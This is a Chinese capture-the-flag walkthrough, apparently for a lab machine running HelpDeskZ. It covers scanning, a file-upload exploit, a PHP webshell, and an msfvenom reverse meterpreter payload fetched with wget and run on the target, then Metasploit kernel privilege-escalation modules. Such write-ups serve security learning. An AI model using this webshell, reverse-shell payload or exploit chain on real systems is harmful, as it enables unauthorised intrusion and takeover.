Help(File upload)

10.10.10.121

1
2
3
4
5
6
7
8
9
10
11
22/tcp   open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.6 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 e5:bb:4d:9c:de:af:6b:bf:ba:8c:22:7a:d8:d7:43:28 (RSA)
|   256 d5:b0:10:50:74:86:a3:9f:c5:53:6f:3b:4a:24:61:19 (ECDSA)
|_  256 e2:1b:88:d3:76:21:d4:1e:38:15:4a:81:11:b7:99:07 (ED25519)
80/tcp   open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
3000/tcp open  http    Node.js Express framework
|_http-title: Site doesn't have a title (application/json; charset=utf-8).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

80

访问10.10.10.121:80,Apache/2.4.18 (Ubuntu) ,默认配置页面

1
2
3
4
5
6
7
8
gobuster -u http://10.10.10.121:80 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

http://10.10.10.121/support/
页面上的登陆表单,有csrf参数,不允许爆破弱口令

换一个字典
apache-user-enum-1.0.txt
gobuster -u http://10.10.10.121:80 -w /usr/share/wordlists/dirbuster/apache-user-enum-1.0.txt

目录扫描

  • gobuster -u http://10.10.10.121:80/support/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
    1
    2
    3
    4
    /uploads (Status: 301)
    /css (Status: 301)
    /includes (Status: 301)
    存在上传目录,302跳转到apache默认配置页面
    
  • gobuster -u http://10.10.10.121/support/uploads -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
    1
    2
    /articles (Status: 301)
    /tickets (Status: 301)
    
  • gobuster -u http://10.10.10.121/support/uploads/tickets -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

exp尝试

  • searchsploit help deskZ
1
2
3
4
5
6
7
8
9
10
11
12
13
14
HelpDeskZ <= v1.0.2 - Unauthenticated Shell Upload
HelpDeskZ < 1.0.2 - (Authenticated) SQL Injection / Unauthorized File Download

searchsploit -m exploits/php/webapps/40300.py
python 40300.py  http://10.10.10.121:80/support/ ports.txt
失败
---
python 40300.py http://10.10.10.121/support/uploads/tickets whale.php

连接错误
requests.exceptions.ConnectionError: HTTPConnectionPool(host='10.10.10.121', port=80): Max retries exceeded with url: /support/uploads/tickets/1cd2ed348346b00c48d3f78579d6431d.php (Caused by NewConnectionError('<urllib3.connection.HTTPConnection object at 0x7f0def11a290>: Failed to establish a new connection: [Errno 110] Connection timed out',))
---
searchsploit -m exploits/php/webapps/41200.py
需要一个可以登陆的口令
  • 尝试文件上传

http://10.10.10.121/support/?v=submit_ticket&action=displayForm

5

6

  • 尝试github的exp
1
2
3
4
5
wget https://raw.githubusercontent.com/trevlee/helpdeskz_exploit/master/exploit

python exploit

python exploit http://10.10.10.121/support/uploads/tickets whale.php

https://raw.githubusercontent.com/trevlee/helpdeskz_exploit/master/exploit

观察exp,是通过时间推算出上传的php脚本的名称,然后组合baseurl,查看状态码是否是200。

如果是200,说明上传成功。

2

首先上传一个php脚本,上传地址参考上述步骤“尝试文件上传”,内容为<?php echo(system($_GET["cmd"])); ?>

1

成功上传webshell

3000 port

1
2
3
4
5
6
7
8
9
10
11
12
10.10.10.121:3000
{"message":"Hi Shiv, To get access please find the credentials with given query"}

X-Powered-By: Express

searchsploit Express
searchsploit Node.js

nikto -h http://10.10.10.121:3000 > nikto.txt

gobuster -u http://10.10.10.121:3000 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
结果,没有发现任何存在目录

提权

信息搜集

3

1
2
3
4
5
6
7
8
cmd=uname+-a
Linux help 4.4.0-116-generic #140-Ubuntu SMP Mon Feb 12 21:23:04 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux
64位linux,ubuntu

pwd
/var/www/html/support/uploads/tickets

cmd=cat+/home/help/user.txt

4

获得help用户的webshell,如果不会这一步,参考https://whale3070.github.io/tag/#/command%20execution


查看内核版本后,searchsploit linux 4.4.0,根据结果,值得尝试msf suggester。

生成64位msf回连载荷,上传

1
2
msfvenom -p linux/x64/meterpreter_reverse_tcp LHOST=10.10.14.2 LPORT=6678 -f elf -o payload.elf
python -m SimpleHTTPServer 8001

攻击机webshell:

1
2
wget http://10.10.14.2:8001/payload.elf -P /tmp
chmod +x /tmp/payload.elf

本地监听:

1
2
msfconsole
handler -H 10.10.14.2 -P 6678 -p linux/x64/meterpreter_reverse_tcp

攻击机webshell: ./payload.elf

本地监听,成功回连msf payload:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
use post/multi/recon/local_exploit_suggester
set SESSION 2

[+] 10.10.10.121 - exploit/linux/local/bpf_priv_esc: The target appears to be vulnerable.
[+] 10.10.10.121 - exploit/linux/local/bpf_sign_extension_priv_esc: The target appears to be vulnerable.
[+] 10.10.10.121 - exploit/linux/local/glibc_realpath_priv_esc: The target appears to be vulnerable.


use exploit/linux/local/bpf_priv_esc
set SESSION 2
set LHOST 10.10.14.2
set LPORT 6679
show options
run
失败

---
use exploit/linux/local/bpf_sign_extension_priv_esc
set payload linux/x64/meterpreter_reverse_tcp
set LHOST 10.10.14.2
set LPORT 6679
set SESSION 2
show options
run

7